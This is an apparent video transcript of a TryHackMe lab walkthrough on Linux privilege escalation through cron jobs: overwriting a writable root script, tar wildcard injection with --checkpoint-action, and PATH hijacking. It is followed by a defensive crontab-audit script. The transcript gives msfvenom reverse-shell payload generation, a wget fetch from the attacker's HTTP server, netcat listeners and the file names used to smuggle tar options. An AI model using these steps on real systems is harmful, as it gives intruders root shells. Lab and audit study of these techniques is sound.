Linux Privilege Escalation Techniques | Cron Jobs | TryHackMe

Captions
Welcome back. Today we're going to continue with the Linux privilege escalation room. In this room we will be going over tasks 8, 9 and 10, where we will be explaining privilege escalation using cron jobs, so let's jump into it. So first you deploy the machine and you log in using the SSH credentials. So after that let's go over the crontab and see what the cron jobs are that are running. So basically to view the cron jobs we can issue the following command: cat /etc/crontab. So based on the output here we have two entries, one for a script overwrite.sh and also another one for compress.sh. So basically we have two cron jobs running for these two scripts. So how can we escalate the privileges based on the output here?

So basically let's go over the first one. First locate where it is located on the system, so using locate overwrite.sh. So locate says it is in /usr/local/bin/overwrite.sh. So one way to escalate the privileges is to check the permissions of the script. So once we check the permissions we can decide if we can overwrite the script with contents crafted from our side. So ls -la and just grep overwrite.sh. So based on the output, as you can see here, the script is writable and readable by the staff group, and the user we are signed in with is actually part of the staff group, so it means we can overwrite the script with our content. Let's view the content of the script: cat overwrite.sh. Oh okay, I think I have to go to the directory, specify the directory. All right: echo date > /tmp/useless. So basically it just echoes the date. So we can change the content of that using an echo command or we can use nano, basically nano overwrite.sh. So here we remove this command and we can replace that. ifconfig, just find the IP, this is my IP address, and we can replace that with a basic bash reverse shell. Let me check, all right, so let's search for reverse shells. Okay, let's see, this one is good: bash reverse shell one-liner. Paste that here, specify the port, in my case 4545, specify the IP, which is here, and that's it. Now let's open the listener on my side, and now we should wait for the script to execute on its own and receive the first shell. So we got the reverse shell back, we're connecting to our machine, and it is root actually. The reason for that is the script is run as root, as you can see. So that is the first method: modifying a script that is running as part of a cron job.

Now the next method. The next method is to examine the compress.sh script. So let's clear here and again display the content of the crontab, then cat compress.sh. So it is doing some kind of, yeah, it is a zip command or tar command, and it is using a wildcard. So one way to exploit the tar command, or take advantage when it is using a wildcard, is by manipulating an environment variable, so basically, uh no, not environment, sorry, we have to manipulate the wildcards. So we can create some sort of payload on our own and then we let tar execute that payload. So here let's exit out of the shell, clear, and create a payload: sudo msfvenom -p linux/x64/shell_reverse_tcp LHOST= (replace that with your IP) LPORT=4545 -f elf -o shell.elf. Meanwhile let's go to GTFOBins, look for tar: file read, file write, sudo, let's see, okay I don't think we will need to use that, um, let's see, tar, up up up, shell. Okay, I think this is the way we should follow here: we have to create some sort of checkpoints and then let tar execute the shell we have created. All right, so we have created our shell. Let's download the shell to the user machine: python3 -m http.server. The server started. wget, so now we are transferring the shell to the target machine, shell.elf. So we've got the shell here now. All right, so here we have got the shell, and let's examine the permissions of compress.sh by typing ls -la. So the script is only readable by the group staff, right, so we can't just overwrite it, so we have to rely on the fact that tar is using the wildcard. Okay, so based on the GTFOBins entry here we have examined, I will create a checkpoint in the home directory, transfer the shell to that home directory and let tar execute the shell I have created in the checkpoint.

So let's see, or let's, yeah, cd /home. All right, so let's now move, cd user, oh, cd /home, okay let me move that one: cp shell.elf into /home/user, or let's mv. Okay, cd /home/user, we've got the shell here. Now let's create two checkpoints: touch, the checkpoint will be located here, --checkpoint=1; the second one, touch, again will be at the same directory, --checkpoint-action, the action will be to execute the shell. Okay, nc -lvp 4545, and now we receive the second reverse shell as the root user. So what happened actually? We created a shell, all right, transferred, yeah, payload, transferred the payload to the home user of the target machine. Now we know that compress.sh contains a tar command that is using wildcards, so if I display the content of that again one more time, as you can see it's using a wildcard. So basically the wildcard will expand to include the files created at the home directory, in the checkpoint, and since their file names are valid tar command line options, tar will recognize them as such. By the way, this is called the wildcard exploitation technique, and it doesn't work in all versions, so make sure your tar, if you have tar, make sure it is up to date, and make sure to use the wildcard correctly. All right, so now that's the second way. All right, if you encounter a tar command in one of the scripts running as a cron job and if the tar command is using a wildcard, that's how you exploit it.

Now the last step, or the last technique, is using the environment variables. So environment variables, I again cat /etc/crontab, so again I have the two scripts, but here we have the PATH environment variable and it starts with /home/user. All right, it starts with /home/user, so if we write a script in the /home/user directory and let one of these scripts execute our payload, it will give us a reverse shell, we can execute our own payload. So basically the overwrite, or the system when executing overwrite, since the path is not specified here, because the path is not specified, the system will use the PATH environment variable, or the values in the PATH environment variable, to locate the script, and once it finds a match it will execute the first match. That's why if we create one in /home/user it will execute it first. So let's see, let's create a script, nano overwrite.sh, in here we can just type our own script, then, um okay, let's exit first, let's go to /tmp. So what I'm gonna do here, I'm gonna create my script here at the /tmp directory and let the overwrite execute the script in the /tmp directory: #!/bin/bash and then let's copy that one-liner, 4545, remember to change the IP address. So remember to give that script execute permissions: shell.sh. Okay, next step now is to modify or to create the overwrite script at the home user, /home/user, nano overwrite.sh, oh yeah that one, okay I'm not gonna listen on that. So basically here we can, what you can do, you can create one, #!/bin/bash, so here one line only: execute the script at the /tmp directory. Let's wait for the shell, and we receive it quickly: id, root. So there is one question to answer: what is the value of the PATH variable in /etc/crontab? So back to /etc/crontab, cat /etc/crontab, this is the value. All right then, so that was about the cron jobs, the privilege escalation technique through cron jobs. So thank you for watching.
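As an added example (not code from the video or from TryHackMe), the following script audits a crontab for the three weaknesses the walkthrough relies on: a cron script writable by its group or by others, a command given without an absolute path while the cron PATH lists a user-writable directory first, and a script that runs tar on a shell wildcard. The crontab text and the file table are constructed samples modelled on the room's two entries; on a real host you would read /etc/crontab and stat the scripts instead.

```python
import re
import stat

# Constructed sample /etc/crontab, modelled on the room's two entries (not the room's file).
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
"""

# Constructed stand-in for the filesystem: path -> (mode bits, script body).
SAMPLE_FILES = {
    "/usr/local/bin/overwrite.sh": (0o664, "#!/bin/bash\necho $(date) > /tmp/useless\n"),
    "/usr/local/bin/compress.sh": (0o644, "#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tgz *\n"),
}

# Directories an unprivileged user can normally write to; a PATH entry here is a hijack risk.
UNTRUSTED_PREFIXES = ("/home/", "/tmp", "/var/tmp")

def audit_crontab(crontab_text, files):
    """Return (script, issue) findings for the cron entries in crontab_text."""
    findings, path_dirs = [], []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):             # cron uses this PATH, not root's login PATH
            path_dirs = line[len("PATH="):].split(":")
            continue
        if "=" in line.split()[0]:               # other VAR=value assignment (e.g. SHELL)
            continue
        fields = line.split(None, 6)             # five time fields, user, command
        if len(fields) < 7:
            continue
        command = fields[6].split()[0]
        if not command.startswith("/"):          # relative name: cron searches PATH in order
            bad = [d for d in path_dirs if d.startswith(UNTRUSTED_PREFIXES)]
            if bad:
                findings.append((command, f"relative path, PATH contains user-writable {bad[0]}"))
            command = next((d + "/" + command for d in path_dirs if d + "/" + command in files), command)
        if command not in files:
            continue
        mode, body = files[command]
        if mode & (stat.S_IWGRP | stat.S_IWOTH):  # group members or everyone can edit the script
            findings.append((command, f"script writable by group/other (mode {mode:o})"))
        if re.search(r"\btar\b[^\n]*\*", body):   # wildcard lets file names become tar options
            findings.append((command, "tar invoked with a shell wildcard"))
    return findings
```

Fixes that make each finding disappear are the ones the room implies: mode 0755 owned by root, absolute paths in every crontab command, a PATH without user-writable directories, and tar given an explicit file list (or `--` before the names) instead of `*`.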
Info
Channel: Motasem Hamdan
Views: 9,393
Keywords: Linux
Id: ewWBJCd6hRY
Length: 17min 21sec (1041 seconds)
Published: Thu Aug 19 2021